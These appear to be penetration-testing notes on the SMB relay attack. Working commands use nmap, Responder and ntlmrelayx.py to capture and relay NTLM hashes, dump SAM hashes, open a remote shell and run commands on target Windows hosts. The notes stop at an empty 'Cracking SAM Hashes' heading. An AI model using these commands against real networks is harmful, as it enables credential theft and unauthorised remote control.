SMB Relay

Steps

1. Identify Host without SMB Signing

2. Configure Responder

3. Run Responder

4. Run NTLM Relay

5. Wait for an event (SMB connection, User login, etc.)

6. Capture Hash

Requirements

• SMB signing must be Disabled or Not Enforced

• By default, SMB signing is Disabled on workstations.

• SMB signing is enabled on Servers.

• Relayed user credentials must be Local Admin on machine for any real value.

• You cannot capture the hash on your machine and relay it back to yourself. You have to relay it on another machine.

SMB Relay Enumeration

General Usage: nmap --script=smb2-security-mode.nse -p445 [IP]-Pn

nmap --script=smb2-security-mode.nse -p445 10.1.1.14-15 -Pn

Configure Responder

The SMB and HTTP options should be turned off.

sudo nano /etc/responder/Responder.conf

Responder

General Usage: sudo responder -I [net interface] -dPv

sudo responder -I eth0 -dPv

NTLM Relay

General Usage: sudo ntlmrelayx.py -tf [target hosts] -smb2support

Once the event has been triggered, ntlmrelayx.py will relay the captured hash to the target hosts and will attempt to dump the local SAM hashes.

sudo ntlmrelayx.py -tf hosts.txt -smb2support

Store NTLMv2 Hashes

When you run the SMB Relay attack normally, it won't show you the NTLMv2 that was relayed to the machines. You can use the option --output-file [filename] to store the relayed NTLMv2 hash to a file.

sudo ntlmrelayx.py -tf hosts.txt -smb2support --output-file ntlmv2.txt

Other SMB Relay Attacks

Interactive Shell

You would also need to run netcat to access the client shell.

sudo ntlmrelayx.py -tf targets.txt -smb2support -i

nc 127.0.0.1 11000

Run Commands

sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Cracking SAM Hashes